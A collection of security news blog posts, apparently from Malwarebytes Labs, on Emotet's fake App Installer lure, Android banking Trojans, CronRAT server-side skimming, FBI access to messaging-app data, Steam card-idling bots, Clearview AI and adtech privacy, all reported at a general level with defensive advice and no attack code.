IT NEWS

Emotet being spread via malicious Windows App Installer packages

As reported by Cryptolaemus on Twitter, and demonstrated step by step by BleepingComputer, Emotet is now being distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.

How does the attack work?

To understand what Microsoft is supposed to do about this method, we need to look at how these attacks work. URLs are sent out to victims by using malspam. The emails are sent to appear as replies to existing conversations by using stolen reply-chain emails. In the email they ask the receiver to look at an attachment. Clicking the link brings the victim to a fake Google Drive page that prompts them to click a button to preview the PDF document.

If you use the “Preview PDF” button it triggers an ms-appinstaller URL that attempts to open a file with an  .appinstaller extension hosted on Microsoft Azure using URLs at *.web.core.windows.net. Appinstaller files mostly belong to App Installer by Microsoft. An .appinstaller file helps if you need multiple users to deploy your MSIX installation file. This is an XML file that you can create yourself or create, for example by using Visual Studio. The .appinstaller file specifies where your app is located and how to update it.

When attempting to open an .appinstaller file, the Windows browser will prompt if you wish to open the Windows App Installer program to proceed. In this case, once you agree, you will be shown an App Installer window prompting you to install the “Adobe PDF Component.” This malicious package looks like a legitimate Adobe application, as it has a legitimate Adobe PDF icon, a valid certificate which marks it as a ‘Trusted App’, and fake publisher information.

If a user chooses to proceed with the install—and why would they stop this far down the rabbit hole?—App Installer will download and install the malicious appxbundle hosted on Microsoft Azure. This bundle drops a .dll on the affected system and creates a startup entry for this .dll. This startup entry will automatically launch the DLL when a user logs into Windows. At that point you are infected with Emotet.

Hosting malicious files on Azure

Microsoft’s Azure cloud services have become an attractive option for cybercriminals to store malicious content. Not just for malicious files as in the case of Emotet, but also for phishing sites, other fraudulent sites, and command and control servers. Azure is certainly not alone, other content hosting sites like Google Drive, Dropbox, and Amazon’s web services are also abused to store malicious content. But critics are hard on Microsoft since it consider itself a security vendor. By the time of writing, the .appinstaller file was removed, but it was available for download longer than it should have been.

appinstaller removed
The URL for the .appinstaller returns a 404 error

While we understand how difficult it is to inspect everything that gets uploaded into your cloud service, and that you can’t study every new customer under a microscope, we also do not know how much time passed between the first report of this new Emotet distribution method and the actual takedown.

Microsoft is receiving flack because it is its cloud service hosting malware, its app installer is used in the process, and its Operating System (Windows) is the target of the attacks. Does that make it an enabler? Not really and certainly not voluntarily.

Emotet

While we all thought and hoped that Emotet had kicked the bucket, it made a dramatic comeback a few weeks ago. And using new distribution methods is a clear sign that it is serious about the comeback.

So, don’t click those links, even if the URL looks trustworthy, the file icon looks legit, and the file is signed. Check with the alleged sender about whether the message really comes from them and is intended for you.

Stay safe, everyone!

The post Emotet being spread via malicious Windows App Installer packages appeared first on Malwarebytes Labs.

Most people aren’t upgrading to Windows 11: Not the end of the world

Windows 11 is experiencing an apparent lack of uptake among Windows users. If this survey is accurate, less than 1% of 10 million PCs surveyed are running the new operating system. In fact, more machines are using Windows XP.

That may surprise you. It might even seem like a bit of an embarrassing failure for Microsoft. However, the low numbers could well be a very good thing overall. It was always going to be a slow uptake, and we’re going to look at some of the reasons why.

Low numbers are to be expected – and that’s fine

There are quite a few barriers to entry for anyone looking to upgrade to Windows 11. In fact, it’s not just businesses facing Windows headaches. It’s home users too, but perhaps for somewhat different reasons.

  1. Old apps: A big reason ancient operating systems like XP still run in organisations is down to old, business critical apps. For most businesses, no one size fits all solution exists. Some of the tech will be outsourced. Bits of it will operate remotely, rather than in house. There’ll be bespoke applications made by someone who left the organisation 5 years ago. Most folks won’t know how it operates, just how to patch it if something goes wrong. Pulling it out will break lots of business critical systems, and there’s no guarantee a replacement will work. Oh, and by the way: it only runs on Windows XP. That’s how you end up with XP and other old operating systems all over the place. They’ve carved their tiny niche, and almost nothing will dislodge them.
  2. Strict requirements and confusing messaging: This boils down to TPM, or Trusted Platform Module. Microsoft made this a requirement to install the newer operating system. It’s an additional security feature which helps keep bad people away from your data. Unfortunately, initial descriptions of TPM were somewhat confusing. The continued state of malaise over TPM is likely keeping folks away from Windows 11 for the time being. Even now, it’s tricky to find people who make business decisions on tech who are familiar with the issue, and have the required equipment to run Windows 11 the way it’s supposed to be run.
  3. Gaming headaches: Many home users have avoided Windows 11 because of the potential impact on gaming performance. People don’t generally want to spend thousands on gaming rigs, then find their expensive graphics card is suddenly underperforming. If they’re running mid-range or cheap cards, they’re probably even more likely to say no. There’s definitely an air of “wait and see” where this is concerned. Nobody wants to mess up their pre-loaded Windows 10 box with a failed 11 upgrade. Folks who built their machines from scratch will probably want to stay with Windows 10 for the time being too. It’s just too much of a leap in the dark at the moment.

These are the main points, but we can think of some more.

Windows 10: ageing like a fine wine

Do people actually need to suddenly jump into Windows 11? What’s the compelling reason for doing so? It seems very likely that for most people, there just isn’t one. Yet.

I often use Windows 10. I’m fine with it, after a few false starts at the beginning. The handful of alterations to core functionality and usability that I’ve heard about, aren’t things I’m particularly interested in. They’re not deal-breakers, but I just wonder “Why bother? This works fine.”

Does Microsoft want people to adopt quickly?

I think we forget that Windows 10 has already been around for 6 years. It’s not a new thing anymore! Microsoft is entirely happy to keep Windows 10 chugging along. Support for it won’t end until October 14, 2025. That’s four more years of Windows 10 action, and it’ll still be used for some time after that. By that point, some of the more peculiar quirks will have been ironed out. Businesses will have a better feel for it.

If we’re lucky, the TPM hardware issues won’t be as big a concern. Some orgs may even have figured out how to update that in-house app from XP to 11 (they will not). And hey, you can always pay for patches on End of Life operating systems, should you really want to.

It seems, on balance, that it’s better to have the rollout happen slowly. Network admins have enough security concerns to worry about. Do they really need to hurl the shiny new Windows 11 into the network and juggle that responsibility too? The numbers seem to suggest not, and it’s possible Microsoft is also happy with this approach.

Whatever your decision, we wish you well in the upgrade struggles to come.

The post Most people aren’t upgrading to Windows 11: Not the end of the world appeared first on Malwarebytes Labs.

Have you downloaded that Android malware from the Play Store lately?

Security researchers have discovered banking Trojan apps on the Google Play Store, and say they have been downloaded by more than 300,000 Android users.

As you may know, banking Trojans are kitted for stealing banking data like your username and password, and two-factor authentication (2FA) codes that you use to login to your bank account. They also capable of stealing phone keystrokes, and taking screenshots of what you’re seeing on your phone as you use it. All these are done without the victim’s consent and without them noticing anything until it’s too late.

The particular malicious apps the ThreatFabric researchers found were disguised to look like apps that an Android user might normally search for, such as QR scanners, PDF scanners, cryptocurrency wallets, and fitness monitors. Knowing that a portion of Android users are aware that the Play Store often gets malware—thus are quite wary about what they download—these apps actually come with the functions they advertised, further alleviating any doubts in users minds about their legitimacy.

But, as users will soon realize, looking and acting (or sounding) like something they are expected to look and act like are only limited to ducks, as these apps begin to show their true intent after they have been installed.

So, how do these benign apps become fully malicious? The cybercriminals behind them introduce malicious code as updates to the apps—slowly and surely. It’s a common evasion tactic which gets their malicious app into the Play Store without raising alarms at the door. Note, however, that these apps can only be manually updated to have the Trojan code should the attackers desire it.

So, the human element is now introduced in an Android attack chain. Obviously, the attackers have adapted this method from the ransomware playbook.

If ransomware attackers can handpick their targets and rummage through files within their compromised networks, these Android attackers can handpick devices “infected” with their apps and manually start the download of the Trojan code in a specific region of the world. To illustrate, let’s say “Fitness App Alpha” is installed in one device in California, USA and one in Montreal, Canada. Bad Guy flicks the switch to have Trojan code downloaded into “Fitness App Alpha” in California. This means that “Fitness App Alpha” in California is now Trojanized, while the one in Montreal is not.

threatfabric victim filtering
Code sample taken from the app where attackers can target Android users who are customers of certain financial institutions they are after. This method is used by actors behind the Anatsa campaign. (Source: ThreatFabric)
threadfabric device filtering
Attackers cannot only pick their victims based on their region. They can also target Android users based on the device they use—a method used by those behind the Alien campaign. (Source: ThreatFabric)

According to ThreatFabric, filtering “makes automated detection a much harder strategy to adopt by any organization.”

Not only that, incrementally updating the app, location checking, and device checking are also methods that attackers use to ensure their app is running on actual Android devices and not on a security researcher’s testing environment.

“This incredible attention dedicated to evading unwanted attention renders automated malware detection less reliable,” the researchers further stated in their blog post. “Actors behind it took care of making their apps look legitimate and useful. There are large numbers of positive reviews for the apps. The number of installations and presence of reviews may convince Android users to install the app.”

In four months, four Android malware families have spread across the Google Play Store. They are Anatsa, Alien, Hydra, and Ermac. Their campaigns have fooled thousands of Android users, and we can only imagine how much they have already stolen from them until they were discovered and reported.

How to keep dodgy apps out of your phone

When looking for apps, make time to do your research. If you’re after, say, QR codes, searching for “the top QR codes” or “the best QR codes” may be a good start as there are dozens of articles on the internet about this very subject. If you trust the publisher of these articles, you can be assured that they have looked into these apps and tested these themselves before giving their recommendations.

Another way is to head straight to the Play Store and look for apps (a) with good reviews, (b) a large user base, and (c) that have been in the Play Store for quite some time now (at least 12 months). Be wary, of course, of reviews that could be fake. But if the app you want ticks most or all of the boxes I mentioned above, dig a little bit more deeper and find out what its problems are and why some users don’t like it.

You could also consider installing security software on your phone. We’d be remiss here if we didn’t mention that Malwarebytes has an Android product.

Lastly, now is probably a good time to also audit your apps and get rid of those that you no longer use or update. You’re safer this way, too.

The post Have you downloaded that Android malware from the Play Store lately? appeared first on Malwarebytes Labs.

Here’s what data the FBI can get from WhatsApp, iMessage, Signal, Telegram, and more

Not every secure messaging app is as safe as it would like us to think. And some are safer than others.

A recently disclosed FBI training document shows how much access to the content of encrypted messages from secure messaging services US law enforcement can gain and what they can learn about your usage of the apps.

The infographic shows details about iMessage, Line, Signal, Telegram, Threema, Viber, WeChat, WhatsApp, and Wickr. All of them are messaging apps that promise end-to-end encryption for their users. And while the FBI document does not say this isn’t true, it reveals what type of information law enforcement will be able to unearth from each of the listed services.

Note: A pen register is an electronic tool that can be used to capture data regarding all telephone numbers that are dialed from a specific phone line. So if you see that mentioned below it refers to the FBI’s ability to find out who you have been communicating with.

iMessage

iMessage is Apple’s instant messaging service. It works across Macs, iPhones, and iPads. Using it on Android is hard because Apple uses a special end-to-end encryption system in iMessage that secures the messages from the device they’re sent on, through Apple’s servers, to the device receiving them. Because the messages are encrypted, the iMessage network is only usable by devices that know how to decrypt the messages. Here’s what the document says it can access for iMessage:

  • Message content limited.
  • Subpoena: Can render basic subscriber information.
  • 18 USC §2703(d): Can render 25 days of iMessage lookups and from a target number.
  • Pen Register: No capability.
  • Search Warrant: Can render backups of a target device; if target uses iCloud backup, the encryption keys should also be provided with content return. Can also acquire iMessages from iCloud returns if target has enabled Messages in iCloud.

Line

Line is a freeware app for instant communications on electronic devices such as smartphones, tablets, and personal computers. In July 2016, Line Corporation turned on end-to-end encryption by default for all Line users, after it had earlier been available as an opt-in feature since October 2015. The document notes on Line:

  • Message content limited.
  • Suspect’s and/or victim’s registered information (profile image, display name, email address, phone number, LINE ID, date of registration, etc.)
  • Information on usage.
  • Maximum of seven days’ worth of specified users’ text chats (Only when end-to-end encryption has not been elected and applied and only when receiving an effective warrant; however, video, picture, files, location, phone call audio and other such data will not be disclosed).

Signal

Signal is a cross-platform centralized encrypted instant messaging service. Users can send one-to-one and group messages, which can include files, voice notes, images and videos. Signal uses standard cellular telephone numbers as identifiers and secures all communications to other Signal users with end-to-end encryption. The apps include mechanisms by which users can independently verify the identity of their contacts and the integrity of the data channel. The document notes about Signal:

  • No message content.
  • Date and time a user registered.
  • Last date of a user’s connectivity to the service.

This seems to be consistent with Signal’s claims.

Telegram

Telegram is a freeware, cross-platform, cloud-based instant messaging (IM) system. The service also provides end-to-end encrypted video calling, VoIP, file sharing and several other features. There are also two official Telegram web twin apps—WebK and WebZ—and numerous unofficial clients that make use of Telegram’s protocol. The FBI document says about Telegram:

  • No message content.
  • No contact information provided for law enforcement to pursue a court order. As per Telegram’s privacy statement, for confirmed terrorist investigations, Telegram may disclose IP and phone number to relevant authorities.

Threema

Threema is an end-to-end encrypted mobile messaging app. Unlike other apps, it doesn’t require you to enter an email address or phone number to create an account. A user’s contacts and messages are stored locally, on each user’s device, instead of on the server. Likewise, your public keys reside on devices instead of the central servers. Threema uses the open-source library NaCl for encryption. The FBI document says it can access:

  • No message content.
  • Hash of phone number and email address, if provided by user.
  • Push Token, if push service is used.
  • Public Key
  • Date (no time) of Threema ID creation.
  • Date (no time) of last login.

Viber

Viber is a cross-platform messaging app that lets you send text messages, and make phone and video calls. Viber’s core features are secured with end-to-end encryption: calls, one-on-one messages, group messages, media sharing and secondary devices. This means that the encryption keys are stored only on the clients themselves and no one, not even Viber itself, has access to them. The FBI notes:

  • No message content.
  • Provides account (i.e. phone number)) registration data and IP address at time of creation.
  • Message history: time, date, source number, and destination number.

WeChat

WeChat is a Chinese multi-purpose instant messaging, social media and mobile payment app. User activity on WeChat has been known to be analyzed, tracked and shared with Chinese authorities upon request as part of the mass surveillance network in China. WeChat uses symmetric AES encryption but does not use end-to-end encryption to encrypt users messages. The FBI has less access than the Chinese authorities and can access:

  • No message content.
  • Accepts account preservation letters and subpoenas, but cannot provide records for accounts created in China.
  • For non-China accounts, they can provide basic information (name, phone number, email, IP address), which is retained for as long as the account is active.

WhatsApp

WhatsApp, is an American, freeware, cross-platform centralized instant messaging and VoIP service owned by Meta Platforms. It allows users to send text messages and voice messages, make voice and video calls, and share images, documents, user locations, and other content. WhatsApp’s end-to-end encryption is used when you message another person using WhatsApp Messenger. The FBI notes:

  • Message content limited.
  • Subpoena: Can render basic subscriber records.
  • Court order: Subpoena return as well as information like blocked users.
  • Search warrant: Provides address book contacts and WhatsApp users who have the target in their address book contacts.
  • Pen register: Sent every 15 minutes, provides source and destination for each message.
  • If target is using an iPhone and iCloud backups enabled, iCloud returns may contain WhatsApp data, to include message content.

Wickr

Wickr has developed several secure messaging apps based on different customer needs: Wickr Me, Wickr Pro, Wickr RAM, and Wickr Enterprise. The Wickr instant messaging apps allow users to exchange end-to-end encrypted and content-expiring messages, including photos, videos, and file attachments. Wickr was founded in 2012 by a group of security experts and privacy advocates but was acquired by Amazon Web Services. The FBI notes:

  • No message content.
  • Date and time account created.
  • Type of device(s) app installed on.
  • Date of last use.
  • Number of messages.
  • Number of external IDs (email addresses and phone numbers) connected to the account, bot not to plaintext external IDs themselves.
  • Avatar image.
  • Limited records of recent changes to account setting such as adding or suspending a device (does not include message content or routing and delivery information).
  • Wickr version number.

Conclusion

If there is one thing clear from the information in this document it’s that most, if not all, of your messages are safe from prying eyes in these apps, unless you’re using WeChat in China. Based on the descriptions, you can check out which apps are available on your favorite platform and which of the bullet points are relevant to you, to decide which app is a good choice for you.

The safest way however is to make sure the FBI doesn’t consider you a person of interest. In those cases even using a special encrypted device can pose some risks.

Stay safe, everyone!

The post Here’s what data the FBI can get from WhatsApp, iMessage, Signal, Telegram, and more appeared first on Malwarebytes Labs.

Capcom Arcade Stadium’s record player numbers blamed on card mining

Some of my favourite retro video games are making waves on Steam, but not in the way you might think. Classics such as Strider, Ghosts n’ Goblins, and more are all available as content for Capcom Arcade Stadium. This is an emulator which lets you play 31 arcade games from the 80s/90s. The games themselves are paid downloadable content, but the main emulator download itself is free. It also comes with one free game as a taster of the full edition.

It didn’t have a great reception at launch, because people didn’t like titles being sold in bundles only. As such, it was something of a surprise to see it riding high at the top end of the Steam activity charts in the last few days.

Sure, the games can now be bought individually. But would that really equate to an all-time concurrent tally of 481,088 players? Did people really wake up this week and think “What we need in our lives is 3 different versions of Street Fighter 2”?

The numbers game

Make no mistake, these are some of the biggest numbers you can achieve on Steam and it typically requires a massive AAA+ title to achieve it. For example, right now the three top played games on Steam are:

  1. Counter Strike: Global Offensive with 507,995 players
  2. Dota 2 with 325,679 players
  3. PUBG: Battlegrounds with 150,498 players

These are all huge online games, played against other people. Yet somehow we have the archaic arcade emulator, with its one free game by default, storming into the top three.

These numbers are so vast, Capcom Arcade Station has managed to hit 8th place in the top records for most simultaneous players. What could have possibly caused this? The faithful translation of arcade controls to gamepads? The ability to rewind the game should you make a mistake? Customising the individual game’s arcade cabinet before loading up a title?

Nope, it’s bots.

How did bots cause the great player count inflation of 2021?

Generally when we talk about bots in gaming, we mean hacked accounts or PCs performing certain tasks. It could be a DDoS attack, or sending out phishing messages inside game chat, or some other nefarious activity.

In this case, the “bot” is something a little bit different. It’s not something caused by what happens inside the game itself. Rather, it’s a layer of virtual economy and digital goods driving what happens to the player count.

Before we get to the nitty gritty, it’s time to explain the ins and outs of Steam card trading.

Steam card trading

Sometimes folks get confused on this, so for clarity, there’s two types of “Steam card”. The first is an actual, physical gift card you can buy in stores. These cards have monetary amounts assigned to them, and they’re a way to preload your Steam account with credit. You then use it to purchase games from the store. You can also buy “digital” versions of these cards which perform the same function.

The other type of card, the one we’re focusing on, are Steam trading cards. These are items which are tied to certain games, but don’t exist within them. They’re essentially cool looking virtual cards with characters from the game on them. The more you play a game, the more likely the chance you’ll be given a free card drop. When you collect all of the cards for a game, you can create a badge for your Steam profile. At the same time, you’ll be given other community-centric items like emoticons, the possibility of discount coupons for other games, or even the option to bump up your Steam level (another profile feature).

The system is designed so you can’t just grab all of the cards by playing. There’s a limit on how many you’ll receive and then you need to get the rest by trading with friends, or buying from the Steam marketplace.

This is a very detailed system with a lot of depth to it. Steam trading is big business, and often one of the focal points for scams, phishes, and malware antics. However, that’s not the case here.

Rather, it appears to be users trying to game the system for their own ends. For once, nobody is compromising accounts and running off with a sack full of stolen logins.

Still, this begs the question: what is happening here?

The wonderful world of card mining

It’s not just Bitcoin hogging all the space in the mines these days. Steam cards can also be mined, and there’s a surprising number of tools available to do it. One of the most popular is something called ArchiSteamFarm. This is a third party tool you can log into with your Steam credentials, and it’ll tell you what can/can’t be farmed. If there are card drops available, you simply tell it which games of yours to “idle” on and we’re off to the card mining races. You don’t have to download the game in order to idle, which makes it super convenient for people wanting cards without gigabytes of downloads and wasted hard drive space.

This is where things get really interesting.

Steam cards usually only drop for paid titles. If you don’t buy the game, you can’t get cards. In this case, the base Capcom Arcade Simulator game is a free download with one free title included. This isn’t (and shouldn’t!) be enough to have cards start dropping.

However, something seems to have gone wrong. All of a sudden, people found they could obtain trading cards despite only having the free game. This meant a huge surge in botting activity to grab cards before someone at Valve—the company behind Steam—fixed it.

Screenshot 2021 12 01 at 16.25.46

As a result, a massive amount of card miners fired up their tools (whether ArchiSteamFarm or something else entirely), and idled their way to sweet card victory. As above, there’s limitations on how many cards you can farm. Once you hit the limit, that’s it – no more mining on that game ever. You have to trade or buy the rest. So this is, essentially, people just wanting to get in on the ground floor of red hot card trading action.

Watching Steam achievement totals drop in real time

As this Ars Technica article notes, you can observe clues regarding the automated action taking place. One way to do this is by checking out Steam achievement numbers. Around 44.6% of people had gained the achievement for loading up a game for the first time a couple of days ago. Now, the number sits at just 7.9%. That’s lower than the previous figure in the article. The only way this number makes sense given the massive user numbers is if huge amounts of new game owners are using tools to “idle” while prospecting for card drops.

The leaky card pipeline has apparently been fixed, so no amount of idling will produce any more cards. This happens to games occasionally, most notably when an error caused card drops for Life is Strange 2. What usually happens after an incident like this is the market is flooded and card value plummets, so it’s probably a fraught time on the old trading card stock exchange or something.

When retro revivals are no more…

Unfortunately my dreams of a Strider revival off the back of massive player numbers and a sudden boom in retro gaming now seems unlikely. On the bright side, the peculiar rise in player numbers didn’t involve people up to no good with malware or phishing.

While Valve probably won’t be too pleased by the inadvertent rush on cards, that is at least one small mercy we can be thankful for.

The post Capcom Arcade Stadium’s record player numbers blamed on card mining appeared first on Malwarebytes Labs.

Massive faceprint scraping company Clearview AI hauled over the coals

Life must be hard for companies that try to make a living by invading people’s privacy. You almost feel sorry for them. Except I don’t.

The UK’s Information Commissioner’s Office (ICO)—an independent body set up to uphold information rights—has announced its provisional intent to impose a potential fine of just over £17 million (roughly US$23 million) on Clearview AI.

In addition, the ICO has issued a provisional notice to stop further processing of the personal data of people in the UK and delete what ClearviewAI has, following alleged serious breaches of the UK’s data protection laws.

What is Clearview AI?

Clearview AI was founded in 2017, and started to make waves when it turned out to have created a groundbreaking facial recognition app. You could take a picture of a person, upload it and get to see public photos of that person, along with links to where those photos appeared.

According to its own website, Clearview AI provides a “revolutionary intelligence platform”, powered by facial recognition technology. The platform includes a facial network of 10+ billion facial images scraped from the public internet, including news media, mugshot websites, public social media, and other open sources.

Yes, scraped from social media, which means that if you’re on Facebook, Twitter, Instagram or similar, then your face may well be in the database.

Clearview AI says it uses its faceprint database to help law enforcement fight crimes. Unfortunately it’s not just law enforcement. Journalists uncovered that Clearview AI also licensed the app to at least a handful of private companies for security purposes.

Clearview AI ran a free trial with several law enforcement agencies in the UK, but these trials have since been terminated, so there seems to be little reason for Clearview to hold on to the data.

And worried citizens that wish to have their data removed, which companies have to do upon request under the GDPR, are often required to provide the company with even more data, including photographs, to be considered for removal.

It’s not just the UK that’s worried. Earlier this month, the Office of the Australian Information Commissioner (OAIC) ordered Clearview AI to stop collecting photos taken in Australia and remove the ones already in its collection.

Offenses

The ICO says that the images in Clearview AI’s database are likely to include the data of a substantial number of people from the UK and these may have been gathered without people’s knowledge from publicly available information online.

The ICO found that Clearview AI has failed to comply with UK data protection laws in several ways, including:

  • Failing to process the information of people in the UK in a way they are likely to expect or that is fair
  • Failing to have a process in place to stop the data being retained indefinitely
  • Failing to have a lawful reason for collecting the information
  • Failing to meet the higher data protection standards required for biometric data (classed as ‘special category data’ under the GDPR and UK GDPR)
  • Failing to inform people in the UK about what is happening to their data
  • And, as mentioned earlier, asking for additional personal information, including photos, which may have acted as a disincentive to individuals who wish to object to their data being processed

Clearview AI Inc now has the opportunity to make representations in respect of these alleged breaches set out in the Commissioner’s Notice of Intent and Preliminary Enforcement Notice. These representations will then be considered and a final decision will be made.

As a result, the proposed fine and preliminary enforcement notice may be subject to change or there will be no further formal action.

There is some hope for Clearview AI if you look at past fines imposed by the ICO.

Marriot was initially expected to receive a fine of 110 million Euros after a data breach that happened in 2014 but wasn’t disclosed until 2018, but Marriot ended up having to pay “only” 20 million Euros. We can expect to hear a final decision against Clearview AI by mid-2022.

Facial recognition

A facial recognition system is a technology capable of matching a human face from a digital image or a video frame against a database of faces, typically employed to identify and/or authenticate users.

Facial recognition technology has always been controversial. It makes people nervous about Big Brother. It has a tendency to deliver false matches for certain groups, like people of color. Police departments have had access to facial recognition tools for almost 20 years, but they have historically been limited to searching government-provided images, such as mugshots and driver’s license photos.

Gathering images from the public internet obviously makes for a much larger dataset, but it’s not the intention with which the images were posted.

It’s because of the privacy implications that some tech giants have backed away from the technology, or halted their development. Clearview AI clearly is not one of them. Neither a tech giant nor a company that cares about privacy.

The post Massive faceprint scraping company Clearview AI hauled over the coals appeared first on Malwarebytes Labs.

CronRAT targets Linux servers with e-commerce attacks

There’s an interesting find over at the Sansec blog, wrapping time and date manipulation up with a very smart RAT attack.

The file, named CronRAT, isn’t an e-commerce attack compromising payment terminals in physical stores. Rather, it looks to swipe payment details by going after vulnerable web stores and dropping payment skimmers on Linux servers. It’s your classic Magecart attack with a stealthy twist.

This method means it bypasses the protection people using the websites arm themselves with, rigging the game from the start. By the time you get onto the website, everything may be fine at your end but the stream further up river has already been polluted. It achieves this thanks to the Linux Cron Job system, which we’ll come back to a little later.

First of all, here’s a brief rundown on what Magecart is, and the difference between client-side and server-side attacks.

What is Magecart?

It’s the collective used for multiple groups who partake in web skimming. These attacks rely on outdated CMSes, or plugin zero days. They may go after small businesses running a particular e-commerce platform. It’s possible they use services like bulletproof hosting to frustrate researchers and law enforcement. Web shells are a popular tactic. There are even impersonators out there, just to make things even more confusing.

Client-side versus server-side attacks

Client-side is where the people who buy things from websites hang out. These are the places where operations such as Magecart may lurk. It could be bogus JavaScript loading in from untrusted domains, or perhaps some other form of rogue code. You can ward off threats such as these by using browser plugins like NoScript. There’s an element of control over these factors, in terms of how you try and secure your browser.

Server-side is an attack on the merchants. Your security processes and tools are great, but when someone is directly corrupting the site under the hood, you may be fighting a lost battle. While your typical web shopper’s first run-in with Magecart would be the previously mentioned rogue JavaScript or other code, this attack means browser-based fixes may not help.

With those out of the way, we’ll loop back to Cron and Cron Jobs.

What is Cron?

Cron is a way that people running a Linux system can schedule tasks. Those tasks will run at a specified time/date in the future, and are known as Cron Jobs. Where things get interesting is that you can enter any date you like, even ones which don’t exist. As long as the system accepts your input, it’ll take it on board and file away in the scheduling system.

CronRAT adds various tasks to the cron table, with a date specification that’ll generate run time errors when triggered. What the malware authors have done is take advantage of the “any date can be used” functionality, and assigned them to February 31st. Of course, this is a date which doesn’t actually exist. As a result, the errors will never happen.

As Sansec puts it:

…the actual malware code is hidden in the task names and is constructed using several layers of compression and base64 decoding.

The payload is a “sophisticated bash program that features self-destruction, timing modulation and a custom binary protocol to communicate with a foreign control server.”

This is definitely one way for Magecart to make waves over the Black Friday period and also further still into the Christmas season.

The problem of digital skimming

Here’s some thoughts from Jerome Segura, our Senior Director of Threat Intelligence:

We’ve known for a long time that there are two different ecosystems when it comes to website security: server-side and client-side. While most security companies focus on the latter, the former is probably the more interesting and perhaps less documented one as it requires access to backend systems. This is an example of a threat that is well crafted and meant to evade detection by default browser-side, but also in some aspects server-side due to its clever obfuscation techniques.

What that means from a digital skimming standpoint is that you are always accepting a level of risk by shopping online and placing trust in the merchant’s ability to keep their systems safe. You should be aware of any subtle changes in payment forms and other possible giveaways that a website is not up to par. Without getting too technical, certain things like outdated copyright information or broken HTML elements may be an indication that the store is not keeping their site up to date.

An attacker will first compromise online shops that are vulnerable to attacks, so it makes sense to stay clear of those that are not following best practices.

Safety first

There’s lots of things you can do out there in the real world to avoid ATM skimmers, and related threats. You can also be proactive in the realm of web-based skimmers targeting the sites you make payments on. Issues such as CronRAT may take a little while longer for various industries to figure out.

While there are varying levels of protection for web purchases, it may be dependent on payment method and/or location. It’s also not great to know that if payment data has been compromised, it’s possible the criminals have grabbed other data too. While this may not be the most reassuring message to take into the new year, forewarned is most definitely forearmed.

The post CronRAT targets Linux servers with e-commerce attacks appeared first on Malwarebytes Labs.

Hackers all over the world are targeting Tasmania’s emergency services

Emergency services—under which the police, fire, and emergency medical services departments fall—is an infrastructure vital to any country or state. But when those services come under threat from either physical or cyber entities, it’s as good as putting the lives of citizens at risk as well.

Unfortunately, not every place has the means and manpower like the US to put pressure on cybercriminals who dare target their vital infrastructures. And this is probably why some threat actors would rather take their chances targeting other countries for profit.

As a case in point, the island state of Tasmania in Australia continues to be subjected to multiple cyberattacks on its emergency services from all around the globe.

Hackers have tried breaking into Tasmania Police employee accounts over 800 times in the last 12 months, according to an internal report from the Department of Police, Fire and Management (DPFEM) that was obtained by ABC News Australia.

And that’s just the tip of the iceberg. The report also revealed:

  • CCTV cameras have been compromised
  • A section of the Tasmania Fire Service website was taken over by one or more unknown parties for at least two weeks
  • Two-factor authentication (2FA) was defeated in five occasions on devices owned by DPFEM employees

The DPFEM is said to store and maintain personally identifiable data and classified information, which makes it a goldmine for hackers. If it was ever completely compromised, DPFEM said it won’t be able to bounce back as quickly as the Federal Group, Tasmania’s casino operator that fell victim to a ransomware attack from the DarkSide hacking group, did.

“Unlike Federal Group, DPFEM will not be able to recover its entire business operation in under six weeks, even with external assistance, because its Information Security Program is not mature enough to determine the full extent of a system compromise and, therefore, will be required to take all its systems back to bare metal to ensure environmental integrity,” the report said.

The report recommended that the Tasmania Police and Fire Service should invest an $550,221 annually to “keep the department cyber safe.”

The post Hackers all over the world are targeting Tasmania’s emergency services appeared first on Malwarebytes Labs.

A week in security (Nov 22 – Nov 28)

Last week on Malwarebytes Labs

Stay safe!

The post A week in security (Nov 22 – Nov 28) appeared first on Malwarebytes Labs.

ICO challenges adtech to step up privacy protection

The UK Information Commissioner’s Office (ICO) wants the advertising industry to come up with new initiatives that address the risks of adtech, and take account of data protection requirements from the outset.

The ICO is an independent body set up to uphold information rights. The technology that is currently in use by the advertising industry has the potential to be highly privacy intrusive. And the ICO has the right to issue, on initiative or on request, opinions to Parliament, government, other institutions or bodies, and the public, on any issue related to the protection of personal data.

The problem

The concept is simple: Advertisers want to show adverts to individuals who are likely to buy their product, and consumers prefer to see adverts that are relevant to them over those that are not. To accomplish this, the advertising industry has come up with a complex web of data processing which includes profiling, tracking, auctioning, and sharing of personal data.

That approach leads to advertisers knowing far more about people than they need to, and having to store and secure all that data.

Moves in the right direction

In recent years, the ad industry has developed several initiatives for less intrusive technology to address these privacy risks. These include proposals from Google and other market participants to phase out the use of third-party cookies, and other forms of cross-site tracking, and replace them with alternatives.

Federated Learning of Cohorts (FLoC) is one of the initiatives by Google that aims to thread the needle of offering people targeted ads while respecting their privacy. That initiative got off to a bad start when it became known that Google had quietly added millions of Chrome users to a FLoC pilot without asking them.

Other recent developments highlighted by the ICO include:

  • Proposals like FLoC, that aim to phase out third-party cookies and replace them with alternatives.
  • Increases in the transparency of online tracking, such as Apple’s App Tracking Transparency, which has had a notable impact—both in terms of the number of users exercising control over tracking, as well as the market itself.
  • Mechanisms to enable individuals to indicate their privacy preferences in simple and effective ways.
  • Developments by browser developers to include tracking prevention in their software.

As an example of the last point, Enhanced Tracking Protection in Firefox automatically blocks trackers that collect information about your browsing habits and interests. But this is not  as effective as you might hope. Blocking third-party cookies and related mechanisms does partially restrict cross-site trackers, but as long as a tracker is still being loaded in your browser, it can still track you. Not as easy as it was before, but tracking is still tracking, and the most prevalent cross-site trackers (looking at you,  Google and Facebook) are certainly still tracking you.

Google

Google’s status in the digital economy means that any proposal it puts forward has a significant impact. Not just because of the market share of its browser, but also due to the services it offers individuals and organizations, and the large role it plays in the digital advertising market.

In 2019, Google announced its vision for the Google Privacy Sandbox. The building blocks for this were essentially:

  • Most aspects of the web need money to survive, and advertising that relies on cookies is the dominant revenue stream.
  • Blocking ads or cookies can prevent advertisers from generating revenue, threatening #1.
  • If you block easily controllable methods like cookies, advertisers may turn to other techniques, like fingerprinting, that are harder for users to control.

Expectations

The ICO is attempting to insert itself into the rapidly evolving situation around adtech by means of a recently published opinion:

There is a window of opportunity for proposal developers to reflect on genuinely applying a data protection by design approach. The Commissioner therefore encourages Google and other participants to demonstrate how their proposals meet the expectations this opinion outlines.

The ICO is encouraging Google and other advertisers to demonstrate new proposals that can meet a set of expectations set out in the Opinion. It wants to see proposals to remove the use of technologies that lead to intrusive and unaccountable processing of personal data and device information, which increases the risks of harm to individuals.

